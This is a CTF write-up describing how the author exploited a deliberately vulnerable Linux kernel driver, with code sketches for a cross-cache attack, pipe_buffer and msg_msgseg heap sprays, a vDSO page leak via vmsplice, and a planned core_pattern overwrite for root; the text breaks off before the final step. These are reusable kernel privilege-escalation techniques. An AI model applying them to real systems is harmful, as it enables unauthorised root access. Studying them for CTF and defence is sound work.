Level 2 - not quite baby kernel (linux kernel pwn)

Linux kernel heap pwn

This was the most challenging of the three pwnable challenges, and it took me about two weeks to solve. It was especially hard given my lack of background in kernel pwn. Fortunately I eventually solved it (although not in the intended way :P)


The challenge provides us with the following files:

- src
  - paradox.c
  - Makefile
- bzImage
- kernel_config_linux-6.12.38
- rootfs.cpio.gz
- start.sh  

Here, paradox.c is the C code which implements the vulnerable Linux driver, and the Makefile specifies how to compile it. bzImage is the compressed kernel image, kernel_config_linux-6.12.38 lists the kernel's config options, rootfs.cpio.gz is the compressed filesystem, and start.sh boots the kernel in QEMU.

Before delving into paradox.c let's cover some setup first:

We start by inspecting start.sh to understand the protections the kernel has:

```sh
#!/bin/sh

cd "$(dirname "$0")" || exit 1
qemu-system-x86_64 -m 128M \
	-monitor /dev/null \
	-serial stdio \
	-smp cores=2 \
	-kernel ./bzImage \
	-initrd ./rootfs.cpio.gz \
	-nographic \
	--append "console=ttyS0 kaslr loglevel=2" \
	-nographic \
	-cpu kvm64,+smap,+smep \
	-enable-kvm
```

We can see that KASLR is enabled (kernel code is loaded at a randomised address), and that SMAP and SMEP are enabled. This means that while in kernel mode, the CPU cannot access data in user pages (SMAP), and cannot execute code in user pages (SMEP).

To make it easier to debug, you should disable KASLR temporarily (append nokaslr), add -s to tell QEMU to open a GDB server on TCP port 1234, and add -no-reboot and -no-shutdown so we can stop and inspect the machine when a kernel crash occurs. Your start.sh will now look like this:
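
A sketch of the modified script; the only changes are the flags just described:

```sh
#!/bin/sh

cd "$(dirname "$0")" || exit 1
qemu-system-x86_64 -m 128M \
	-monitor /dev/null \
	-serial stdio \
	-smp cores=2 \
	-kernel ./bzImage \
	-initrd ./rootfs.cpio.gz \
	-nographic \
	--append "console=ttyS0 nokaslr loglevel=2" \
	-cpu kvm64,+smap,+smep \
	-enable-kvm \
	-s -no-reboot -no-shutdown
```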

To decompress rootfs.cpio.gz into an actual folder we can use the below decompress.sh:
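
```sh
#!/bin/sh
# hedged sketch of decompress.sh: standard cpio unpacking, paths illustrative
mkdir -p rootfs
cd rootfs || exit 1
gunzip -c ../rootfs.cpio.gz | cpio -idmv
```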

Now I prepare my workflow to compile exploit C code and re-compress the filesystem back into rootfs.cpio.gz, using mycompress.sh and compress.sh (sketched below; exact paths are illustrative).

mycompress.sh:
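
```sh
#!/bin/sh
# hedged sketch: compile the exploit statically, drop it into the rootfs,
# then repack (paths are illustrative)
gcc -static -o rootfs/exploit exploit.c -lpthread
./compress.sh
```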

compress.sh:
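
```sh
#!/bin/sh
# hedged sketch: repack rootfs/ into rootfs.cpio.gz
cd rootfs || exit 1
find . -print0 | cpio --null -o -H newc | gzip -9 > ../rootfs.cpio.gz
```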

Now that the prep work is done, let's look at paradox.c:

To be honest, it's quite a lot of code, so let me summarise what's going on:

There are three main structs: paradox_session_data, timeline and temporal_event. They have roughly the following structures:
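
The driver source isn't reproduced in this post, so this is a hedged reconstruction from behaviour we observe later: the offsets of causal_weight (+0x8) and causal_dependency (+0x10) and the 0x70-byte object size match the debugger output further down, but field names and ordering are guesses.

```c
/* hedged reconstruction -- not the actual source */
struct temporal_event {
    u64 event_id;                             /* +0x00 (assumed)              */
    refcount_t causal_weight;                 /* +0x08: the refcount          */
    struct temporal_event *causal_dependency; /* +0x10: event that caused us  */
    struct list_head node;                    /* +0x18: link in the timeline  */
    char description[0x48];                   /* sized so the object is 0x70  */
};

struct timeline {
    u64 id;
    struct temporal_event *causal_origin;     /* event that caused the timeline */
    struct list_head events;                  /* events within this timeline  */
    struct list_head node;                    /* link in the session          */
};

struct paradox_session_data {
    struct list_head timelines;               /* all timelines of this fd     */
    u64 next_timeline_id;
    u64 next_event_id;
};
```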

paradox_engine_open

Each file descriptor that you open via open("/dev/paradox_engine", O_RDONLY) invokes paradox_engine_open, which instantiates the session by associating a paradox_session_data with it. We know this because it does something like:
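
```c
/* hedged sketch of the relevant line in paradox_engine_open */
file->private_data = session;
```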

It also instantiates a timeline object and calls it the primordial timeline, and creates a temporal_event called the first cause. Each session has a list of all timelines, while each timeline has an event it is caused by and a list of events within that timeline.

As for the temporal event, note the following:
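
```c
/* hedged sketch of the allocation in paradox_engine_open */
event = kmem_cache_zalloc(temporal_event_cache, GFP_KERNEL);
refcount_set(&event->causal_weight, 1);
```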

The temporal event comes from its own dedicated cache. This will be important later.

Also note that this event has its refcount causal_weight set to 1.

paradox_engine_ioctl

This function essentially specifies the ways in which a user can interact with the device. In particular, they can choose to either create a timeline or create an event.

Create timeline

Request structure:

ioctl code:
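
(A hedged reconstruction pieced together from the description below; the request layout, names and the find_event helper are illustrative, not the actual source.)

```c
struct create_timeline_req {
    u64 cause_timeline_id;   /* timeline holding the causing event  */
    u64 cause_event_id;      /* event which caused the new timeline */
};

case PARADOX_CREATE_TIMELINE: {
    struct create_timeline_req req;
    struct temporal_event *cause;
    struct timeline *tl;

    if (copy_from_user(&req, (void __user *)arg, sizeof(req)))
        return -EFAULT;
    cause = find_event(session, req.cause_timeline_id, req.cause_event_id);
    if (!cause)
        return -EINVAL;
    event_get(cause);                        /* causal_weight++      */
    tl = kzalloc(sizeof(*tl), GFP_KERNEL);
    tl->id = session->next_timeline_id++;    /* next available id    */
    tl->causal_origin = cause;
    list_add_tail(&tl->node, &session->timelines);
    return tl->id;                           /* returned to the user */
}
```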

When creating a timeline, a user must specify the timeline and its event which caused this new timeline to occur. The timeline is created with the next id available, and it is added to the session. The event that caused this timeline gets event_get called on it, which basically increases the refcount causal_weight. If the request was successful, the new timeline's id is returned to the user.

Create event

Request structure:

ioctl code:
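
(Again a hedged reconstruction; pay attention to the ordering of the last two blocks, which becomes important in a moment.)

```c
struct create_event_req {
    u64 timeline_id;          /* timeline the event belongs to         */
    u64 cause_event_id;       /* 0 means "not caused by another event" */
    char description[0x48];   /* size is a guess                       */
};

case PARADOX_CREATE_EVENT: {
    struct create_event_req req;
    struct temporal_event *event, *cause;
    struct timeline *tl;

    if (copy_from_user(&req, (void __user *)arg, sizeof(req)))
        return -EFAULT;
    tl = find_timeline(session, req.timeline_id);
    if (!tl)
        return -EINVAL;
    event = kmem_cache_zalloc(temporal_event_cache, GFP_KERNEL);
    refcount_set(&event->causal_weight, 1);
    memcpy(event->description, req.description, sizeof(event->description));
    event->event_id = session->next_event_id++;

    list_add_tail(&event->node, &tl->events); /* added to the timeline FIRST */

    if (req.cause_event_id != 0) {            /* cause looked up AFTER       */
        cause = find_event(session, req.timeline_id, req.cause_event_id);
        if (cause) {
            event_get(cause);
            event->causal_dependency = cause;
        }
    }
    return event->event_id;
}
```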

Once again the event is allocated from temporal_event_cache and its data is zeroed. Its refcount is initialised to 1. The user's description is copied into the object, and the event that caused this event to happen has its refcount increased by 1. If req.cause_event_id is 0, however, the new event isn't caused by another event. If the request is successful, the driver returns the event's id to the user.

Looking for the vuln

For some background, refcount bugs are rather common, and are usually used to count how many times an object was referred to. When its refcount drops to 0 it is usually freed. This case is no different: When event_put is called on an object and its refcount goes from 1 -> 0, the object is freed:
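
(A hedged sketch; the saturation values we see later suggest a standard refcount_t, and the later stages of the exploit rely on the free being a plain kfree.)

```c
static void event_put(struct temporal_event *event)
{
    if (refcount_dec_and_test(&event->causal_weight))
        kfree(event);
}
```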

It actually took me some time (and GPTing) to figure out the vuln, but eventually I realised the problem: when we create a temporal event, the event is added to its timeline BEFORE we run the cause-lookup if block (see the create-event sketch above).

This results in it being possible for an event to have itself as its causal dependency.

paradox_engine_release

Let's see the implication of this in paradox_engine_release, which is called when the driver is closed:
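
(A hedged reconstruction matching the walk described below.)

```c
static int paradox_engine_release(struct inode *inode, struct file *file)
{
    struct paradox_session_data *session = file->private_data;
    struct timeline *tl, *tl2;
    struct temporal_event *event, *ev2, *cause, *next_in_chain;

    list_for_each_entry(tl, &session->timelines, node) {
        list_for_each_entry_safe(event, ev2, &tl->events, node) {
            cause = event->causal_dependency;
            while (cause) {                     /* walk the causal chain */
                next_in_chain = cause->causal_dependency;
                event_put(cause);
                cause = next_in_chain;
            }
            event->causal_dependency = NULL;
            event_put(event);
        }
    }
    list_for_each_entry_safe(tl, tl2, &session->timelines, node) {
        event_put(tl->causal_origin);
        kfree(tl);
    }
    kfree(session);
    return 0;
}
```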

It iterates through each timeline. Within each timeline it iterates through each event, and walks its cause = event->causal_dependency, calling event_put every time it finds a new cause. Once that's done, the pointer to its causal_dependency is zeroed, and the event itself has event_put called on it.

Then it iterates through each timeline in the session, calling event_put on the event which caused the timeline. Finally the timeline is freed.

Thereafter, the session is freed.

Implications

If an event has itself as its causal_dependency, what happens is that when we close the driver, the chain-walking loop
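
```c
/* excerpt from the release sketch above */
cause = event->causal_dependency;
while (cause) {
    next_in_chain = cause->causal_dependency;   /* the event itself, again */
    event_put(cause);
    cause = next_in_chain;
}
```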

perpetually has the same event as its cause, and keeps calling event_put on it. Recall event_put from earlier.

What this means is that whenever the refcount causal_weight hits 0 the event gets kfreed. What happens if it goes below 0 (which occurs when the self-referring event gets freed)? The refcount underflows and saturates at a value such as 0xC0000000 or 0xBFFFFFFF (refcount_t's saturation behaviour). It DOES NOT immediately lead to a double-free, and the kfree will still only occur once.

๐Ÿ› More tips for debugging

Before exploitation, you may also find the following helpful to make debugging easier:

  • Using the linux source code for linux 6.12.38 from https://cdn.kernel.org/pub/linux/kernel/v6.x/linux-6.12.38.tar.xz, you should recompile the kernel with debugging symbols. Most CTF challenges (including this one) do not provide kernels with debugging symbols.

    • If you don't want to do this, you can also use this tool to convert the compressed bzImage into an uncompressed vmlinux, then use this tool to convert the vmlinux to an elf. This should be able to recover most symbols to make debugging easier. Then, to debug, do gdb ./kernelelf then target remote :1234 when your kernel is running

  • Use the bata24 gef fork as your debugger; it is ahead of pwndbg and the main gef fork, and comes with many features supporting kernel debugging. I found the commands pagewalk-with-hints, slub-dump, xf and slab-contains most helpful.

    • To easily find the victim object when debugging, all I needed to do was find its description using xf "self-referring event"

Verifying trivial wins

Take note that there can actually be trivial leaks in kernel challenges via dmesg, kernel warnings, or similar. However, in init.sh we see these two lines:
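
(init.sh isn't reproduced here; the two lines are almost certainly the standard hardening pair, something like the following, though the exact lines may differ:)

```sh
echo 1 > /proc/sys/kernel/dmesg_restrict
echo 2 > /proc/sys/kernel/kptr_restrict
```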

so trivial leaks are unfortunately out of the question.

I also tried to look for n-days in the given linux kernel itself, but unfortunately couldn't find any.

Exploitation

Here are the high-level steps my exploit follows, which I will elaborate on later:

  1. Perform a cross-cache attack on a self-referring event, ensuring that its page can get reclaimed by a CPU we control.

  2. Spray pipe_buffers and reclaim the page as one pipe's data page. Write bytes into all the pipes until we find which one's page reclaimed the victim, and the offset of the victim temporal_event within the page.

  3. Spray ENLARGED pipe rings so that an array of pipe_buffer structs reclaims the order 9/10 page.

    1. Write 1 byte into each pipe fd, then read 1 byte back, to use and release the first pipe_buffer slot. Subsequent writes/splices will use the second pipe_buffer in the ring.

  4. Reset the victim's refcount to 1, and partially overwrite the victim's temporal_event * to point to the previously reclaimed order 9/10 page. The infinite loop then causes that page to get kfreed.

  5. Reclaim the freed page by spraying msg_msgseg. This "releases" the infinite loop and the CPU that was previously running it. We now have a msg_msgseg overlapping multiple pipe_buffers.

  6. Use the vmsplice syscall to splice a vDSO memory page into the pipes from step 3. This causes the second pipe_buffer in the UAF'd page to have its struct page pointer point to a page responsible for kernel text.

  7. Read from msg_msgseg to leak the address of the page * for kernel text.

  8. Prepare a fake pipe_buffer with page and offset values calculated to point at the core_pattern page, and set PIPE_BUF_FLAG_CAN_MERGE in the pipe flags.

  9. Reclaim the previously freed msg_msgseg by spraying msg_msgseg again, overwriting the second pipe_buffer in the UAF'd page with the page * for core_pattern.

  10. Write to the pipe_buffer to overwrite core_pattern, and trigger a crash to get a root shell.

Part 1. Cross-cache attack

Remember how earlier we said that temporal events are allocated from their own dedicated cache? Presumably via something like:
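
```c
/* hedged sketch of the cache creation */
temporal_event_cache = kmem_cache_create("temporal_event_cache",
                                         sizeof(struct temporal_event),
                                         0, 0, NULL);
```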

This makes exploitation more difficult: when we free a temporal_event, its page still belongs to temporal_event_cache. When we then allocate other objects, they come from pages of different caches, i.e. they will not reuse the freed page (and thus never overlap our victim object!)

But there is a technique called cross-cache attack which allows us to still make this happen. The cross-cache attack allows the victim page to be reclaimed by any other object, reopening more exploitation techniques!

To perform this technique, I found these black hat slides particularly instructional. The gist of it is:

  1. Pin the task to a CPU

  2. Drain partially free slabs

    1. Allocate objs_per_slab * (1 + cpu_partial) objects (you can find these values in /sys/kernel/slab/temporal_event_cache/objs_per_slab and /sys/kernel/slab/temporal_event_cache/cpu_partial)

  3. Allocate objs_per_slab - 1 objects as pre-alloc objects

  4. Allocate the victim object

  5. Allocate objs_per_slab + 1 objects as post-alloc objects

  6. Free the victim, pre-alloc and post-alloc objects

  7. Free one object per slab from step 2

    1. This triggers flushing of the CPU partial list, allowing the victim slab to be released to the page allocator

At this point my code for the cross-cache attack looked something like the final version shown below, with one crucial difference in the order of frees.

Note that regardless of which fd you use to create events, they use the same cache and pages. Essentially, the events created on fd2 would get freed first on cpu1, followed by the events created on fd1, which would get freed on cpu0.

My intention was for the (OBJS_PER_SLAB - 1) * CPU_PARTIAL objects and the self-referring event to be freed first on cpu1. Thereafter, the pre-alloc and post-alloc objects would be freed on cpu0.

This was a costly mistake, since freeing the self-referring event on cpu1 first causes the victim page to be on cpu1's per-cpu partial list, and cpu1 was the cpu with the infinite loop which I couldn't control.

๐Ÿง  The solution to this was quite simple: Instead of freeing the self-referring event first, free the pre-alloc and post-alloc objects first!

Here's the final working cross-cache code:
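
My exact code isn't reproduced here, so below is a condensed, hedged sketch. The helpers (pin_to_cpu, spray_events, spray_events_split, make_self_referring_event, free_one_per_slab) are illustrative: because the driver only frees events when a session closes, the real code spreads allocations across many fds so that groups of objects can be freed independently.

```c
pin_to_cpu(0);

/* step 2: drain partially free slabs */
spray_events(drain_fds, OBJS_PER_SLAB * (1 + CPU_PARTIAL));

/* steps 3-5: pre-alloc objects, victim, post-alloc objects
 * (pre/post halves go to fd1 and fd5; the victim event is on fd2) */
spray_events_split(fd1, fd5, OBJS_PER_SLAB - 1);
make_self_referring_event(fd2);     /* predicts its own next event id */
spray_events_split(fd1, fd5, OBJS_PER_SLAB + 1);

/* step 6: free the pre/post objects FIRST, from CPU 0 */
close(fd5);   /* gets the victim slab onto CPU 0's partial list */
close(fd1);

/* then free the victim -- from a thread pinned to CPU 1, because this
 * close never returns (paradox_engine_release loops forever) */
close(fd2);

/* step 7: free one object per slab from the drain set; the partial list
 * overflows and the now-empty victim slab returns to the page allocator */
free_one_per_slab(drain_fds);
```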

Half of the pre- and post-alloc objects are in fd1, while half are in fd5. The self-referring object uses fd2.

โ— The key difference is: I first close fd5 to free half the pre- and post- alloc objects in CPU 0, to get the victim slab in CPU 0's partial list

With this, after the cross-cache attack my victim page was in the free area and could be reclaimed by CPU 0!

Part 2. Spraying pipe_buffer to reclaim victim page

When we inspect the victim page, this is what we will see:

For reference, recall the temporal_event layout sketched earlier (causal_weight at +0x8, causal_dependency at +0x10).

Notice that the victim object is from 0xffff888006494bd0 - 0xffff888006494c3f while the post-alloc object is from 0xffff888006494c40 - 0xffff888006494caf

Furthermore, note that the victim's refcount is 0xbfffffff, meaning it has underflowed, and its causal_dependency pointer points to itself at 0xffff888006494bd0.

โœ๏ธ Another important note is that all the objects are spaced 0x70 = 112 bytes apart. This is a highly abnormal size which was made possible by the use of the dedicated slab cache. In practice, it is very difficult for us to find exploitable kernel objects of this exact size. Ideally we would want the object to have the same size as other objects in the kmalloc- or kmalloc-cg- caches.

โš ๏ธ If we tried to reclaim the page by spraying objects of a different size, and accidentally overwrite the causal_dependency pointer with an invalid non-null value, when the paradox_engine_release dereferences the pointer in the loop, the kernel would crash!

๐Ÿง  If we just overwrite causal_dependency with NULL, the loop simply terminates, and we don't use the infinite loop to kfree anything else. We basically "waste" the vulnerability.

๐Ÿ‘€ Ideally, we want to reclaim it with something that we can control so that we can control what we kfree next! If we overwrite the refcount to 1, and overwrite causal_dependency to something that can be kfreed, we will have a double allocation! But the problem with this is that we don't have any leaks ๐Ÿ˜ข, so we don't know what to overwrite it with either!

๐Ÿ’ก The eureka moment

I spent quite a few days spraying different objects to find out what could be a possible solution. As I was playing with pipe_buffer, I realised that very often the page storing the buffer's data would reclaim the victim page, and the data I write into the pipe would overwrite the bytes in the victim page. When we write into this page, we can overwrite the causal_weight refcount, followed by the temporal_event * .

This got me wondering: Is it possible that writing into this pipe could allow partial overwrites? What if instead of overwriting all 8 bytes of the temporal_event * I could just overwrite 1, or 2, or 3? ๐Ÿค”

It turns out, you can!

Now let's think about what we can do with this in mind:

  • Spray pipe_buffers; one of their data pages will reclaim the victim page

  • Since the refcount is always +0x8-bytes aligned, first write 0x10 bytes into each pipe. Then read those 0x10 bytes to see if the last 8 bytes had changed, for example from \x00\x00\x00\x00\x00\x00\x00\x01 to \x00\x00\x00\x00\xc0\x00\x00\x00 or to \x00\x00\x00\x00\xbf\xff\xff\xff . If they did change, then we know that the victim object is at offset +0x000 within the victim page, and we will also know which pipe holds the victim page.

    • Otherwise if the victim object is not at offset +0x000, we repeat the previous step, but this time writing 0x20 bytes and reading 0x20 bytes. We repeat this until we find the offset of the victim object within the victim page, and we know which pipe holds the victim page.

In doing this, we have found the pipe holding the victim page and the offset of the victim object within the victim page, without ever touching the temporal_event * pointer. That's great!
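
A hedged sketch of the probe (pfds[] is the pipe spray from the first bullet; the event_put loop still spinning on CPU 1 is what changes the refcount bytes underneath us):

```c
/* returns the index of the pipe whose data page holds the victim object,
 * and sets *victim_off to the object's offset within that page */
int find_victim(int (*pfds)[2], int npipes, size_t *victim_off)
{
    char w[0x1000] = {0}, r[0x1000];

    for (size_t len = 0x10; len <= 0x1000; len += 0x10) {
        for (int i = 0; i < npipes; i++) {
            write(pfds[i][1], w, len);
            usleep(100);               /* let CPU 1 clobber the refcount */
            read(pfds[i][0], r, len);
            if (memcmp(r + len - 8, w + len - 8, 8) != 0) {
                *victim_off = len - 0x10;   /* refcount sits at +0x8 */
                return i;
            }
        }
    }
    return -1;
}
```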

โ“ Now the question is: What do we do with our partial overwrite primitive on the temporal_event *? To answer this question, I took a quick look at the pages in the page allocator using the buddy-dump command to see if there was anything useful. Note that at this point, my temporal_event * was 0xffff888006494bd0.

I saw this:

What is "order"?

The buddy allocator maintains blocks of free pages where each block is a power-of-two number of pages. The exponent of the power-of-two block size is referred to as the order. If your order is 3, for example, that means the block has 2^3 = 8 pages.

View this page for more info.

This is great for two reasons:

  1. If I overwrite the least significant 3 bytes of temporal_event * to \x60\x00\x00 I would be able to get this exact address

  2. This pattern is consistent across reboots! Let's see another run:

Self-referring event at 0xffff88800654ea80, order-9 unmovable page at 0xffff888006600000:

๐Ÿ‘ So if we do something like this:

  • Spray an object X to reclaim the order-9 page

  • Partial overwrite temporal_event * to trigger kfree on its address

  • Spray another object Y to reclaim the page again,

We could achieve an overlap between objects X and Y! Wonderful!

Part 3. Spraying enlarged pipe_buffers to claim the order-9 page

Now I was once again on the hunt for a new object. It had to be relatively large, so that I could get it to claim the order-9 page within a reasonable time, and it had to satisfy two more requirements.

โš ๏ธ Ideally at offset +0x10 it should have NULL. Why? Look at temporal_event and the infinite loop again:

In the first round of the loop, after we set refcount = 1 and do the partial overwrite, next_in_chain would be our page address. This then becomes cause.

In the second round of the loop, next_in_chain would be whatever is at page+0x10 .

If page+0x10 is not null, the third round of the loop would do cause->causal_dependency (which is actually (*cause).causal_dependency ) and dereference the value at page+0x10 .

We also have a third requirement: whatever is at offset +0x8 of the page overlaps with what the driver thinks is the temporal_event's refcount, so we should be able to set this to 1 if we actually want the reclaiming object to get freed by event_put.

๐Ÿ“œ To summarise what we need of object X:

  • Relatively large

  • Value at +0x10 is (hopefully) null

  • Value at +0x8 == 1

I was once again stuck at this point for several days. And then I saw the light. How? By again playing with pipe_buffer. Let's look closely at this bad boy, shall we?
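
Here's the actual struct from include/linux/pipe_fs_i.h, with x86-64 offsets annotated:

```c
struct pipe_buffer {
    struct page *page;                      /* +0x00 */
    unsigned int offset, len;               /* +0x08, +0x0c */
    const struct pipe_buf_operations *ops;  /* +0x10 */
    unsigned int flags;                     /* +0x18 */
    unsigned long private;                  /* +0x20; 0x28 bytes in total */
};
```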

โ—Note that pipe_buffer structs don't exist in isolation; rather, they are allocated as a consecutive array of pipe buffers. In fact, there is another struct called pipe_inode_info which points to a ring of pipe_buffers in its pipe_inode_info.buf field.

๐ŸŸข pipe_buffer actually satisfies the "relatively large" requirement since we can enlarge the array via the function fcntl(pipe_fd, F_SETPIPE_SZ, PAGE_SIZE * n) which changes the pipe ring size. (Here n should be a power of 2 according to this).

๐ŸŸข pipe_buffer also satisfies the third requirement since we can control the value of pipe_buffer->offset by reading from it.

At first glance it seems useless, as it literally has a pointer (ops) at offset +0x10. If we simply created a pipe_buffer in our page and then triggered the vulnerability, we would get cooked: ops would be treated as the next cause and dereferenced, crashing us somewhere down the line.

๐Ÿ‘ผ But here's our saving grace: When a pipe_buffer gets released, its ops field actually gets nulled! This is fantastic for us, since we can simply allocate then release the first pipe_buffer in the ring to null out whatever is at offset +0x10! We are still free to use the rest of the pipe_buffers in the page for exploitation.

There's a catch, however: a non-privileged user is limited in the max pipe size they can allocate, which can be checked in /proc/sys/fs/pipe-max-size:
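
(The kernel default, which I'd expect unchanged here, is 1 MiB:)

```sh
$ cat /proc/sys/fs/pipe-max-size
1048576
```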

After spraying a bit (and praying), I found that spraying just 50 of these max-sized pipes was sufficient to consistently claim the order-9 page.

So for this step, basically just spray 50 of these max-sized pipes, then write and read 1 byte from each of them to trigger the first buffer's release, which NULLs out the ops pointer. The same write+read also leaves pipe_buffer->offset = 1, which allows the page to be freed when event_put is called on it!

Here's the code for this part:
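
A hedged sketch of this part (counts and names are illustrative):

```c
#define NBIG 50
int big_pipes[NBIG][2];
char c = 'A';

for (int i = 0; i < NBIG; i++) {
    pipe(big_pipes[i]);
    /* enlarge the ring: 1 MiB / 0x1000 = 256 pipe_buffers, i.e. a
     * 256 * 0x28 = 0x2800-byte allocation for the array */
    fcntl(big_pipes[i][1], F_SETPIPE_SZ, 0x100000);
    write(big_pipes[i][1], &c, 1);  /* use the first pipe_buffer slot...  */
    read(big_pipes[i][0], &c, 1);   /* ...then release it: ops = NULL and
                                       offset = 1 (our "+0x8 == 1")       */
}
```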

Part 4. Trigger vuln

As discussed previously, overwrite the victim object, setting its refcount to 1 and overwriting the least significant 3 bytes to \x60\x00\x00. This should cause the page claimed in the previous step to now be freed!

To do so, free the victim pipe whose id we now know, and spray pipe_buffer again.

The issue here was that freeing this victim pipe sometimes caused the page to go into CPU 1's partial list, which I did not have control of. This could have been due to some balancing of CPU partial lists. To deal with this issue, I created some dummy pipes (calling pipe then writing into each), and closed them before closing the victim pipe.

โ— This reclamation is only successful slightly less than 50% of the time, and it's where my exploit loses the bulk of its consistency.

Code:
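
A hedged sketch (victim_pipe and victim_off come from the earlier probe; the offsets assume the temporal_event layout sketched at the start):

```c
/* dummy pipes, freed before the victim so its page lands on CPU 0 */
for (int i = 0; i < NDUMMY; i++) {
    close(dummy[i][0]);
    close(dummy[i][1]);
}
close(pfds[victim_pipe][0]);
close(pfds[victim_pipe][1]);

/* respray: whichever pipe reclaims the page rewrites the victim event */
char payload[0x1000] = {0};
*(uint32_t *)(payload + victim_off + 0x08) = 1;  /* refcount = 1 */
payload[victim_off + 0x10] = 0x00;               /* low 3 bytes of the   */
payload[victim_off + 0x11] = 0x00;               /* pointer, so it ends  */
payload[victim_off + 0x12] = 0x60;               /* in ...600000         */
for (int i = 0; i < NRESPRAY; i++) {
    pipe(respray[i]);
    write(respray[i][1], payload, victim_off + 0x13);
}
```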

Part 5. Overlapping objects X and Y

Now we need to choose an object Y which will overlap with our array of pipe_buffers. Note that since the vuln triggers the kfree on CPU 1 (our infinite loop runs there), this part has to be done from CPU 1. I achieved this by creating a thread and pinning it to CPU 1.

Note that our object here should claim a page of order ≤ 2, because the re-released page (the 16 KiB pipe_buffer ring) is of order 2.

The ideal candidate here, of course, would be msg_msgseg since we pretty much get arbitrary read + write over the entire struct, and we can modify its size by controlling the size of the data we send using msgsnd. As we can freely modify its size, we can also control the order of the page it reclaims.

Background on System V IPC

Function Signatures:
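
```c
int msgget(key_t key, int msgflg);
int msgsnd(int msqid, const void *msgp, size_t msgsz, int msgflg);
ssize_t msgrcv(int msqid, void *msgp, size_t msgsz, long msgtyp, int msgflg);
```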

Sending messages via System V IPC first needs you to create a message queue as follows:
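
```c
int qid = msgget(IPC_PRIVATE, 0666 | IPC_CREAT);
```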

Then using the queue id, you can send a message as such:
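
```c
struct { long mtype; char mtext[0x1000]; } msg = { .mtype = 1 };
msgsnd(qid, &msg, sizeof(msg.mtext), 0);
```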

and receive them as such:
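
```c
msgrcv(qid, &msg, sizeof(msg.mtext), /*mtype=*/0, 0);
```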

Note: In msgrcv, you can specify IPC_NOWAIT | MSG_COPY if you don't want the underlying msg_msg or msg_msgseg structs to be freed when the message is received

Note: Specifying the message's mtype when sending and receiving messages allows you to specify which message you want. If your msgrcv mtype is 0, you just get the first message in the queue.

What is msg_msgseg?

First, understand that the size of a msg_msg struct is 0x30, and the rest of the struct is the transmitted data. If the data sent exceeds (0x1000 - 0x30) = 0xfd0 bytes, the remaining data is transmitted in a msg_msgseg struct. msg_msgseg struct has an 8-byte pointer, and user data comes after.
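
For reference, the two structs (from ipc/msg.h and ipc/msgutil.c):

```c
struct msg_msg {
    struct list_head m_list;
    long m_type;
    size_t m_ts;               /* message text size */
    struct msg_msgseg *next;
    void *security;
    /* the actual message follows immediately: 0x1000 - 0x30 = 0xfd0 bytes */
};

struct msg_msgseg {
    struct msg_msgseg *next;
    /* the next part of the message follows immediately */
};
```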

I went ahead with a 0x400-sized msg_msgseg spray, which goes into kmalloc-cg-1k. When we run slub-dump kmalloc-cg-1k in gef, we can clearly see that the slab order is 2, because num pages: 4. It is therefore a good size to maximise the chance of msg_msgseg reclaiming the page!

Here's my code for this segment:
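
A hedged sketch (0x3f8 makes the trailing segment allocation exactly 8 + 0x3f8 = 0x400 bytes):

```c
#define NSEG 64                            /* illustrative spray count */
int qids[NSEG];

/* run from a thread pinned to CPU 1 */
cpu_set_t set;
CPU_ZERO(&set);
CPU_SET(1, &set);
sched_setaffinity(0, sizeof(set), &set);

struct { long mtype; char mtext[0xfd0 + 0x3f8]; } m = { .mtype = 1 };
memset(m.mtext, 'S', sizeof(m.mtext));
for (int i = 0; i < NSEG; i++) {
    qids[i] = msgget(IPC_PRIVATE, 0666 | IPC_CREAT);
    msgsnd(qids[i], &m, sizeof(m.mtext), 0);  /* 0xfd0 bytes -> msg_msg,
                                                 0x3f8 bytes -> msg_msgseg */
}
```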

Part 6. vmsplice syscall

Now that we have overlapping msg_msgseg and pipe_buffer structs, we need to think of how to get LPE.

โŒ One option was getting a text leak from pipe_buffer->ops , then replacing it with a stack pivot gadget and doing kROP. But this won't work since SMAP and SMEP are enabled.

After some research, I came across this exploit which had a similar msg_msgseg and pipe_buffer overlap.

What is vdso?

Wikipedia: vDSO (virtual dynamic shared object) is a kernel mechanism for exporting a carefully selected set of kernel space routines to user space applications so that applications can call these kernel space routines in-process, without incurring the performance penalty of a mode switch from user mode to kernel mode that is inherent when calling these same kernel space routines by means of the system call interface.

While vDSO is provided by the kernel, it resides within the user-space portion of a process's virtual address space.

By doing something like this:
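
```c
/* hedged sketch; needs _GNU_SOURCE, vmsplice() is declared in <fcntl.h> */
#include <sys/auxv.h>
#include <sys/uio.h>

void *vdso = (void *)getauxval(AT_SYSINFO_EHDR);  /* vDSO base in userspace */
struct iovec iov = { .iov_base = vdso, .iov_len = 0x1000 };
for (int i = 0; i < NBIG; i++)
    vmsplice(big_pipes[i][1], &iov, 1, 0);
```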

We cause pipe_buffer->page to refer to the page struct corresponding to vDSO. That is, a page responsible for kernel text.

๐Ÿค” Why is this helpful?

With a leaked page* pointer from the pipe_buffer, we can change it to be the page responsible for any region of kernel text! We'll see why this is useful later.

Part 7. Leaking page* of kernel text

To recap what we've done, we:

  1. Sprayed msg_msgseg into the first 0x400 bytes of the page to reclaim the order 2 page

  2. Overwrote some of the msg_msgseg (to be specific the second chunk of 0x28 bytes) using the spliced pipe_buffer, whose page * is responsible for vDSO

Now if we read from msg_msgseg we can get the page * leak! (Note: the ops * leak isn't really necessary)
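
A hedged sketch (MSG_COPY keeps the kernel objects alive; the +0x20 offset is where the second pipe_buffer's page field lands within the copied-out segment data, after accounting for the seg's 8-byte header):

```c
struct { long mtype; char mtext[0xfd0 + 0x3f8]; } r;
uint64_t vdso_page = 0;
int victim_q = -1;

for (int i = 0; i < NSEG; i++) {
    if (msgrcv(qids[i], &r, sizeof(r.mtext), 0, IPC_NOWAIT | MSG_COPY) < 0)
        continue;
    uint64_t p = *(uint64_t *)(r.mtext + 0xfd0 + 0x20);
    /* heuristic: struct page pointers live in vmemmap (0xffffea... here) */
    if ((p >> 40) == 0xffffea) {
        vdso_page = p;
        victim_q = i;
        break;
    }
}
```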

Part 8 + 9. Overwriting the second pipe

Now what can we do with the page * leak? Well, there happens to be a region of kernel memory called core_pattern, which tells the kernel what to do when a process crashes.

From the Linux kernel documentation, /usr/src/linux/Documentation/sysctl/kernel.txt:

[/proc/sys/kernel/]core_pattern is used to specify a core dumpfile pattern name.

  • If the first character of the pattern is a '|', the kernel will treat the rest of the pattern as a command to run. The core dump will be written to the standard input of that program instead of to a file.

In other words, if we overwrite core_pattern with something starting with '|', whatever comes after is a command that the kernel will run (as root, via its usermode helper) whenever a process crashes!

But the question now is: Sure, we know the address of the page * pointing to vDSO, but how do we know the address of the page * responsible for core_pattern? It turns out that the offset between them is constant. By calculating the offset between the vDSO and core_pattern virtual addresses we can also calculate the offset between their respective page * structs!

In my case, I found:

